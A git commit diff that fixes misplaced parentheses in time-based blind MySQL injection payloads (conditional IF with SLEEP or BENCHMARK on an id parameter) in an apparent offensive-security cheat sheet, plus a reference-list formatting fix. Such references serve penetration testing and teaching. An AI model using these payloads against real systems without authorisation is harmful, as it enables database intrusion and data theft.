Fix misplaced parentheses in MySQL Injection.md

2025-02-21 14:16:07 +00:00 · 2025-02-20 00:48:45 +09:00 · 2025-02-20 00:48:45 +09:00 · 37046977fd
commit 37046977fd
parent dd946bedc0
1 changed files with 3 additions and 3 deletions
--- a/Injection/MySQL
+++ b/Injection/MySQL
@ -432,8 +432,8 @@ Extracting column_name.
 ### Using Conditional Statements

 ```sql
-?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
-?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
+?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
+?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1))>=100, 1, SLEEP(3)) --
 ?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 ```

@ -798,4 +798,4 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
 - [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://www.youtube.com/watch?v=u91EdO1cDak)
 - [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)
 - [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
- [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)
+- [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)